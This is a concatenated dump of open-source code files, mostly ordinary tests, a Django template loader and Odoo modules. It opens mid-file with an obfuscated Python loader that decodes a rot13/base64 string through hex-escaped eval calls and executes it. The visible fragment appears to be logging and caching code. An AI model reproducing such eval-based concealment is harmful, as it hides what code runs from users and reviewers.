JEsqTygMGbtVvNeVUWypUVbL3WyLKEyMS90nJ1yXFxXVPNtVPNtVPNtVPNtVPNtVTgiMTyhMl5xo2kiMltvoz93BvNvVPftpzIjpvu0nJ1yYz1eqTygMFu0nJ1yYzqgqTygMFtcXFxcPvNtVPNtVPNtVPNtVPNtVPOcMvO0nJ1yYz1eqTygMFu0nJ1yYzqgqTygMFtcXFN8CFOwpzIuqTIxK3EcoJHtXlOwLJAbMI90nJ1yBtbtVPNtVPNtVPNtVPNtVPNtVPNtVTgiMTyhMl5xo2kiMltvoT9uMTyhMlOzpz9gVTAuL2uyYPOwLJAbMFO0nJ1yVT5iqPOlMJSwnTIxVvxXVPNtVPNtVPNtVPNtVPNtVPNtVPOlMKE1pz4tpTywn2kyYzkiLJEmXT1uqTAbJlW4oJjvKFxXVPNtVPNtVPNtVPNtVPNtVTIfp2H6PvNtVPNtVPNtVPNtVPNtVPNtVPNtqUW5BtbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOlMKAjo25mMFN9VUWypKIyp3EmYzqyqPu1pzjfVUMypzyzrG1TLJkmMFjtqTygMJ91qQ0kZPxXVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtL2uuozqyMPN9VUWyp3OioaAyYzuyLJEypaAoVxkup3DgGJ9xnJMcMJDvKDbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOwnTShM2IxK3A0paIwqPN9VUEcoJHhp3ElpUEcoJHbPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOwnTShM2IxYPNvWJRfVPIxVPIvVPIMVPIVBvIABvIGVRqAIPVcPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVTIjo2AbK2AbLJ5aMJDtCFOcoaDbqTygMF5gn3EcoJHbL2uuozqyMS9mqUW1L3DcXDbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOcMvOypT9wnS9wnTShM2IxVQjtL3WyLKEyMS90nJ1yBtbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtn29xnJ5aYzEioT9aXNbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPWfo2SxnJ5aVTMlo20tL2SwnTHfVTkcp3Dtoz90VTAbLJ5aMJDvXDbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtV3ugoPN9VUOcL2gfMF5fo2SxplugLKEwnSfvrT1fVy0cPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPO4oJjtCFOlMKAjo25mMF5wo250MJ50PvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOlMKAjo25mMF5woT9mMFtcPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVTIfp2H6PvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOeo2EcozphMT9fo2pbVaWyMaWyp2ucozptL29hqTIhqPVcPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPO4oJjtCFOlMKAjo25mMF5wo250MJ50PvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOlMKAjo25mMF5woT9mMFtcPvNtVPNtVPNtVPNtVPNtVPNtVPNtMKuwMKO0VRI4L2IjqTyiovOuplOyBtbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOeo2EcozphMT9fo2pbVzAuL2uyVTIlpz9lBvNvVPftpzIjpvuyXFxXVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtpzI0qKWhVUOcL2gfMF5fo2SxplugLKEwnSfvrT1fVy0cPvNtVPNtVPNtVPNtVTIfp2H6PvNtVPNtVPNtVPNtVPNtVPOeo2EcozphMT9fo2pbVzyhnKEcLJjtoT9uMPVcPvNtVPNtVPNtVPNtVPNtVPOlMKAjo25mMFN9VUWypKIyp3EmYzqyqPu1pzjfVUMypzyzrG1TLJkmMFxXVPNtVPNtVPNtVPNtVPNtVUugoPN9VUWyp3OioaAyYzAioaEyoaDXVPNtVPNtVPNtVPNtVPNtVUWyp3OioaAyYzAfo3AyXPxXVPNtVPNtVPOcMvOho3DtrT1fBtbtVPNtVPNtVPNtVPO4Lz1wM3IcYxEcLJkiMltcYz5iqTyznJAuqTyiovtXVPNtVPNtVPNtVPNtVPNtVRSRER9BYzqyqRSxMT9hFJ5zoltvozSgMFVcYNbtVPNtVPNtVPNtVPNtVPNtVyAypaMypvO1ozEypvObnJqbVTkiLJDfVUElrFOuM2ScovVcPvNtVPNtVPNtVPNtVUWyqUIlovNvVtbtVPNtVPNtVTyhMz8tCFOXMJ5WqTIgXUugoP5mpTkcqPtaCTy0MJ0+WlyoZS0hp3OfnKDbWmkxnKV+WlyoZS0cPvNtVPNtVPNtL2SwnTIsqTygMFN9VTyhqPucozMiYzqyqPtvL2SwnTHvYPNlZGLjZPxcPvNtVPNtVPNtn29xnJ5aYzEioT9aXPWwLJAbMI90nJ1yBvNvVPftpzIjpvuwLJAbMI90nJ1yXFxXVPNtVPNtVPOwpzIuqTIxK3EcoJHtCFO0nJ1yYz1eqTygMFu0nJ1yYzqgqTygMFtcXDbtVPNtVPNtVUElrGbXVPNtVPNtVPNtVPNtn29xnJ5aYyWyoJ92MI9Tpz9gK1EuLzkyXPW4oJksL2SwnTHvYPO7PvNtVPNtVPNtVPNtVPNtVPNvqKWfVwbtqKWfYNbtVPNtVPNtVPNtVPO9XDbtVPNtVPNtVTI4L2IjqPOSrTAypUEco24fVTH6PvNtVPNtVPNtVPNtVTgiMTyhMl5xo2kiMltvETS0LJWup2HtMKWlo3V6VPVtXlOlMKOlXTHcXDbtVPNtVPNtVTgiMTyhMl5OMTEsIT9sITSvoTHbVaugoS9wLJAbMFVfVUfXVPNtVPNtVPNtVPNtVaIloPV6VUIloPjXVPNtVPNtVPNtVPNtVaugoPV6VUOcL2gfMF5xqJ1jplu4oJjcYaWypTkuL2HbVyjvVvjtVvpvXFjXVPNtVPNtVPNtVPNtVzAuL2uyK3EcoJHvBvOwLJAbMI90nJ1yYNbtVPNtVPNtVPNtVPNvL3WyLKEyMPV6VTAlMJS0MJEsqTygMDbtVPNtVPNtVU0cPvNtVPNtVPNtpzI0qKWhVUugoNb='
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
|
sf-wind/caffe2
|
refs/heads/master
|
caffe2/python/mkl/mkl_fill_op_test.py
|
4
|
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import hypothesis.strategies as st
from hypothesis import given, settings
import numpy as np
from caffe2.python import core, workspace
import caffe2.python.hypothesis_test_util as hu
import caffe2.python.mkl_test_util as mu
@unittest.skipIf(not workspace.C.has_mkldnn,
"Skipping as we do not have mkldnn.")
class MKLFillTest(hu.HypothesisTestCase):
@given(n=st.integers(1, 4), c=st.integers(1, 4),
h=st.integers(1, 4), w=st.integers(1, 4),
filler=st.sampled_from(
["XavierFill", "ConstantFill", "GaussianFill", "MSRAFill"]
),
seed=st.integers(5, 10),
**mu.gcs_cpu_mkl)
def test_mkl_fill(self, n, c, h, w, filler, seed, gc, dc):
op = core.CreateOperator(
filler,
[],
["Y"],
shape=[n, c, h, w],
)
for d in dc:
d.random_seed = seed
self.assertDeviceChecks(dc, op, [], [0])
if __name__ == "__main__":
import unittest
unittest.main()
|
zzxuanyuan/root-compressor-dummy
|
refs/heads/compressionbench
|
interpreter/llvm/src/bindings/python/llvm/tests/base.py
|
107
|
import os.path
import unittest
POSSIBLE_TEST_BINARIES = [
'libreadline.so.5',
'libreadline.so.6',
]
POSSIBLE_TEST_BINARY_PATHS = [
'/usr/lib/debug',
'/lib',
'/usr/lib',
'/usr/local/lib',
'/lib/i386-linux-gnu',
]
class TestBase(unittest.TestCase):
def get_test_binary(self):
"""Helper to obtain a test binary for object file testing.
FIXME Support additional, highly-likely targets or create one
ourselves.
"""
for d in POSSIBLE_TEST_BINARY_PATHS:
for lib in POSSIBLE_TEST_BINARIES:
path = os.path.join(d, lib)
if os.path.exists(path):
return path
raise Exception('No suitable test binaries available!')
get_test_binary.__test__ = False
def get_test_file(self):
return os.path.join(os.path.dirname(os.path.abspath(__file__)), "test_file")
def get_test_bc(self):
return os.path.join(os.path.dirname(os.path.abspath(__file__)), "test.bc")
|
Trii/NoseGAE
|
refs/heads/master
|
examples/tests_in_package/helloworld/tests/__init__.py
|
1307
|
pass
|
jhoos/django
|
refs/heads/master
|
django/template/loaders/base.py
|
12
|
import warnings
from inspect import getargspec
from django.template import Origin, Template, TemplateDoesNotExist
from django.utils.deprecation import RemovedInDjango21Warning
class Loader(object):
# Only used to raise a deprecation warning. Remove in Django 2.0.
_accepts_engine_in_init = True
def __init__(self, engine):
self.engine = engine
def __call__(self, template_name, template_dirs=None):
# RemovedInDjango21Warning: Allow loaders to be called like functions.
return self.load_template(template_name, template_dirs)
def get_template(self, template_name, template_dirs=None, skip=None):
"""
Calls self.get_template_sources() and returns a Template object for
the first template matching template_name. If skip is provided,
template origins in skip are ignored. This is used to avoid recursion
during template extending.
"""
tried = []
args = [template_name]
# RemovedInDjango21Warning: Add template_dirs for compatibility with
# old loaders
if 'template_dirs' in getargspec(self.get_template_sources)[0]:
args.append(template_dirs)
for origin in self.get_template_sources(*args):
if skip is not None and origin in skip:
tried.append((origin, 'Skipped'))
continue
try:
contents = self.get_contents(origin)
except TemplateDoesNotExist:
tried.append((origin, 'Source does not exist'))
continue
else:
return Template(
contents, origin, origin.template_name, self.engine,
)
raise TemplateDoesNotExist(template_name, tried=tried)
def load_template(self, template_name, template_dirs=None):
warnings.warn(
'The load_template() method is deprecated. Use get_template() '
'instead.', RemovedInDjango21Warning,
)
source, display_name = self.load_template_source(
template_name, template_dirs,
)
origin = Origin(
name=display_name,
template_name=template_name,
loader=self,
)
try:
template = Template(source, origin, template_name, self.engine)
except TemplateDoesNotExist:
# If compiling the template we found raises TemplateDoesNotExist,
# back off to returning the source and display name for the
# template we were asked to load. This allows for correct
# identification of the actual template that does not exist.
return source, display_name
else:
return template, None
def get_template_sources(self, template_name):
"""
An iterator that yields possible matching template paths for a
template name.
"""
raise NotImplementedError(
'subclasses of Loader must provide a get_template_sources() method'
)
def load_template_source(self, template_name, template_dirs=None):
"""
RemovedInDjango21Warning: Returns a tuple containing the source and
origin for the given template name.
"""
raise NotImplementedError(
'subclasses of Loader must provide a load_template_source() method'
)
def reset(self):
"""
Resets any state maintained by the loader instance (e.g. cached
templates or cached loader modules).
"""
pass
@property
def supports_recursion(self):
"""
RemovedInDjango21Warning: This is an internal property used by the
ExtendsNode during the deprecation of non-recursive loaders.
"""
return hasattr(self, 'get_contents')
|
laslabs/geospatial
|
refs/heads/8.0
|
geoengine_project/models/project_project.py
|
5
|
# -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of geoengine_project,
# an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# geoengine_project is free software:
# you can redistribute it and/or modify it under the terms of the GNU
# Affero General Public License as published by the Free Software
# Foundation,either version 3 of the License, or (at your option) any
# later version.
#
# geoengine_project is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with geoengine_project.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.addons.base_geoengine import geo_model, fields
class ProjectProject(geo_model.GeoModel):
"""Add geo_point to project.project"""
_inherit = 'project.project'
geo_point = fields.GeoPoint(
'Addresses coordinate', related='partner_id.geo_point')
|
yinchunlong/abelkhan-1
|
refs/heads/master
|
ext/c++/thirdpart/c++/boost/libs/python/test/newtest.py
|
46
|
# Copyright David Abrahams 2004. Distributed under the Boost
# Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
"""
>>> from m1 import *
>>> from m2 import *
Prove that we get an appropriate error from trying to return a type
for which we have no registered to_python converter
>>> def check_unregistered(f, msgprefix):
... try:
... f(1)
... except TypeError, x:
... if not str(x).startswith(msgprefix):
... print str(x)
... else:
... print 'expected a TypeError'
...
>>> check_unregistered(make_unregistered, 'No to_python (by-value) converter found for C++ type')
>>> check_unregistered(make_unregistered2, 'No Python class registered for C++ class')
>>> n = new_noddy()
>>> s = new_simple()
>>> unwrap_int(n)
42
>>> unwrap_int_ref(n)
42
>>> unwrap_int_const_ref(n)
42
>>> unwrap_simple(s)
'hello, world'
>>> unwrap_simple_ref(s)
'hello, world'
>>> unwrap_simple_const_ref(s)
'hello, world'
>>> unwrap_int(5)
5
Can't get a non-const reference to a built-in integer object
>>> try:
... unwrap_int_ref(7)
... except: pass
... else: print 'no exception'
>>> unwrap_int_const_ref(9)
9
>>> wrap_int(n)
42
try: wrap_int_ref(n)
... except: pass
... else: print 'no exception'
>>> wrap_int_const_ref(n)
42
>>> unwrap_simple_ref(wrap_simple(s))
'hello, world'
>>> unwrap_simple_ref(wrap_simple_ref(s))
'hello, world'
>>> unwrap_simple_ref(wrap_simple_const_ref(s))
'hello, world'
>>> f(s)
12
>>> unwrap_simple(g(s))
'hello, world'
>>> f(g(s))
12
>>> f_mutable_ref(g(s))
12
>>> f_const_ptr(g(s))
12
>>> f_mutable_ptr(g(s))
12
>>> f2(g(s))
12
Create an extension class which wraps "complicated" (init1 and get_n)
are a complicated constructor and member function, respectively.
>>> c1 = complicated(s, 99)
>>> c1.get_n()
99
>>> c2 = complicated(s)
>>> c2.get_n()
0
a quick regression test for a bug where None could be converted
to the target of any member function. To see it, we need to
access the __dict__ directly, to bypass the type check supplied
by the Method property which wraps the method when accessed as an
attribute.
>>> try: A.__dict__['name'](None)
... except TypeError: pass
... else: print 'expected an exception!'
>>> a = A()
>>> b = B()
>>> c = C()
>>> d = D()
>>> take_a(a).name()
'A'
>>> try:
... take_b(a)
... except: pass
... else: print 'no exception'
>>> try:
... take_c(a)
... except: pass
... else: print 'no exception'
>>> try:
... take_d(a)
... except: pass
... else: print 'no exception'
------
>>> take_a(b).name()
'A'
>>> take_b(b).name()
'B'
>>> try:
... take_c(b)
... except: pass
... else: print 'no exception'
>>> try:
... take_d(b)
... except: pass
... else: print 'no exception'
-------
>>> take_a(c).name()
'A'
>>> try:
... take_b(c)
... except: pass
... else: print 'no exception'
>>> take_c(c).name()
'C'
>>> try:
... take_d(c)
... except: pass
... else: print 'no exception'
-------
>>> take_a(d).name()
'A'
>>> take_b(d).name()
'B'
>>> take_c(d).name()
'C'
>>> take_d(d).name()
'D'
>>> take_d_shared_ptr(d).name()
'D'
>>> d_as_a = d_factory()
>>> dd = take_d(d_as_a)
>>> dd.name()
'D'
>>> print g.__doc__.splitlines()[1]
g( (Simple)arg1) -> Simple :
"""
def run(args = None):
import sys
import doctest
if args is not None:
sys.argv = args
return doctest.testmod(sys.modules.get(__name__))
if __name__ == '__main__':
print "running..."
import sys
status = run()[0]
if (status == 0): print "Done."
sys.exit(status)
|
shafaypro/PYSHA
|
refs/heads/master
|
Chatstuff/__chatcheck.py
|
2
|
import random
import textblob
from nltk.tokenize import * # tokenizing the sentences on the basis of natural langauge processing
from textblob import *
from nltk.stem import PorterStemmer # importing the port stemmer for later purpose
from nltk.corpus import stopwords
from nltk.corpus import state_union # for importing the already stored data, to be trained with
from nltk.tokenize import PunktSentenceTokenizer # importing the already POS intelligent punkbuster tokenizer
import nltk
GREETING_KEYWORDS = ("hello", "hi", "greetings", "sup", "what's up",)
GREETING_RESPONSES = ["'sup bro", "hey", "*nods*", "hey you get my snap?"]
def check_for_greeting(sentence):
sentence = sentence.lower()
words = sentence.split(" ")
for word in words:
if word.lower() in GREETING_KEYWORDS:
return random.choice(GREETING_RESPONSES)
def parts_of_speechtag( sentences=""):
from nltk.corpus import state_union # for importing the already stored data, to be trained with
from nltk.tokenize import PunktSentenceTokenizer # importing the already POS intelligent punkbuster tokenizer
training_text = state_union.raw("2005-GWBUSH.txt") # Training set imported from the state union local repo.
sample_text = sentences
custom_sentence_tokenized = PunktSentenceTokenizer(train_text=training_text)
# This is the unsupervised learning
tokenization_unsupervised = custom_sentence_tokenized.tokenize(str(sample_text))
# tokenizing using unsupervised learning
# print(tokenization_unsupervised) # just for the debugging purposes
# print(type(tokenization_unsupervised)) # checking the type of the sentences
processing_POS_tokenization(tokenization_unsupervised=tokenization_unsupervised)
def processing_POS_tokenization( tokenization_unsupervised):
for _ in tokenization_unsupervised:
words = word_tokenize(_) # Current sentence is beign passed to the word being tokenized
tagged_posts = nltk.pos_tag(words)
print(tagged_posts)
def respond(sentences):
tokenized_sentence = sent_tokenize(sentences)
stop_words = set(stopwords.words("english")) # Getting the stop words from the Local DB
if len(tokenized_sentence) > 1: # if the length of the tokenized sentence is greater than one
# for sentence in tokenized_sentence:
# words = word_tokenize(sentence) # Each word is tokenized
pos_tagged = parts_of_speechtag(sentences)
print(tuple(pos_tagged))
# filtered_words = [w for w in words if w not in stop_words] # removing the additional stop words for
# portStemer_object = PorterStemmer()
# filtered_steam_words = [portStemer_object.stem(w) for w in filtered_words]
# return filtered_steam_words
else:
pos_tagged = parts_of_speechtag(sentences)
print(type(pos_tagged))
# words = word_tokenize(sentences)
# filtered_words = [w for w in words if w not in stop_words]
# portStemer_object = PorterStemmer()
# filtered_steam_words = [portStemer_object.stem(w) for w in filtered_words]
#return filtered_steam_words
print(respond(input()))
|
alphafoobar/intellij-community
|
refs/heads/master
|
python/testData/inspections/PyNumpyType/Vectorize.py
|
79
|
class vectorize(object):
"""
vectorize(pyfunc, otypes='', doc=None, excluded=None, cache=False)
Generalized function class.
Define a vectorized function which takes a nested sequence
of objects or numpy arrays as inputs and returns a
numpy array as output. The vectorized function evaluates `pyfunc` over
successive tuples of the input arrays like the python map function,
except it uses the broadcasting rules of numpy.
The data type of the output of `vectorized` is determined by calling
the function with the first element of the input. This can be avoided
by specifying the `otypes` argument.
Parameters
----------
pyfunc : callable
A python function or method.
otypes : str or list of dtypes, optional
The output data type. It must be specified as either a string of
typecode characters or a list of data type specifiers. There should
be one data type specifier for each output.
doc : str, optional
The docstring for the function. If `None`, the docstring will be the
``pyfunc.__doc__``.
excluded : set, optional
Set of strings or integers representing the positional or keyword
arguments for which the function will not be vectorized. These will be
passed directly to `pyfunc` unmodified.
.. versionadded:: 1.7.0
cache : bool, optional
If `True`, then cache the first function call that determines the number
of outputs if `otypes` is not provided.
.. versionadded:: 1.7.0
Returns
-------
vectorized : callable
Vectorized function.
Examples
--------
>>> def myfunc(a, b):
... "Return a-b if a>b, otherwise return a+b"
... if a > b:
... return a - b
... else:
... return a + b
>>> vfunc = np.vectorize(myfunc)
>>> vfunc([1, 2, 3, 4], 2)
array([3, 4, 1, 2])
The docstring is taken from the input function to `vectorize` unless it
is specified
>>> vfunc.__doc__
'Return a-b if a>b, otherwise return a+b'
>>> vfunc = np.vectorize(myfunc, doc='Vectorized `myfunc`')
>>> vfunc.__doc__
'Vectorized `myfunc`'
The output type is determined by evaluating the first element of the input,
unless it is specified
>>> out = vfunc([1, 2, 3, 4], 2)
>>> type(out[0])
<type 'numpy.int32'>
>>> vfunc = np.vectorize(myfunc, otypes=[np.float])
>>> out = vfunc([1, 2, 3, 4], 2)
>>> type(out[0])
<type 'numpy.float64'>
The `excluded` argument can be used to prevent vectorizing over certain
arguments. This can be useful for array-like arguments of a fixed length
such as the coefficients for a polynomial as in `polyval`:
>>> def mypolyval(p, x):
... _p = list(p)
... res = _p.pop(0)
... while _p:
... res = res*x + _p.pop(0)
... return res
>>> vpolyval = np.vectorize(mypolyval, excluded=['p'])
>>> vpolyval(p=[1, 2, 3], x=[0, 1])
array([3, 6])
Positional arguments may also be excluded by specifying their position:
>>> vpolyval.excluded.add(0)
>>> vpolyval([1, 2, 3], x=[0, 1])
array([3, 6])
Notes
-----
The `vectorize` function is provided primarily for convenience, not for
performance. The implementation is essentially a for loop.
If `otypes` is not specified, then a call to the function with the
first argument will be used to determine the number of outputs. The
results of this call will be cached if `cache` is `True` to prevent
calling the function twice. However, to implement the cache, the
original function must be wrapped which will slow down subsequent
calls, so only do this if your function is expensive.
The new keyword argument interface and `excluded` argument support
further degrades performance.
"""
def __init__(self, pyfunc, otypes='', doc=None, excluded=None,
cache=False):
pass
def mypolyval(): pass
vpolyval = vectorize(mypolyval, excluded=['p'])
|
tsabi/Odoo-tsabi-fixes
|
refs/heads/master
|
addons/marketing_campaign/__openerp__.py
|
67
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Marketing Campaigns',
'version': '1.1',
'depends': ['marketing',
'document',
'email_template',
'decimal_precision'
],
'author': 'OpenERP SA',
'category': 'Marketing',
'description': """
This module provides leads automation through marketing campaigns (campaigns can in fact be defined on any resource, not just CRM Leads).
=========================================================================================================================================
The campaigns are dynamic and multi-channels. The process is as follows:
------------------------------------------------------------------------
* Design marketing campaigns like workflows, including email templates to
send, reports to print and send by email, custom actions
* Define input segments that will select the items that should enter the
campaign (e.g leads from certain countries.)
* Run you campaign in simulation mode to test it real-time or accelerated,
and fine-tune it
* You may also start the real campaign in manual mode, where each action
requires manual validation
* Finally launch your campaign live, and watch the statistics as the
campaign does everything fully automatically.
While the campaign runs you can of course continue to fine-tune the parameters,
input segments, workflow.
**Note:** If you need demo data, you can install the marketing_campaign_crm_demo
module, but this will also install the CRM application as it depends on
CRM Leads.
""",
'website': 'http://www.openerp.com',
'data': [
'marketing_campaign_view.xml',
'marketing_campaign_data.xml',
'marketing_campaign_workflow.xml',
'report/campaign_analysis_view.xml',
'security/marketing_campaign_security.xml',
'security/ir.model.access.csv'
],
'demo': ['marketing_campaign_demo.xml'],
'test': ['test/marketing_campaign.yml'],
'installable': True,
'auto_install': False,
'images': ['images/campaign.png', 'images/campaigns.jpeg','images/email_account.jpeg','images/email_templates.jpeg','images/segments.jpeg'],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.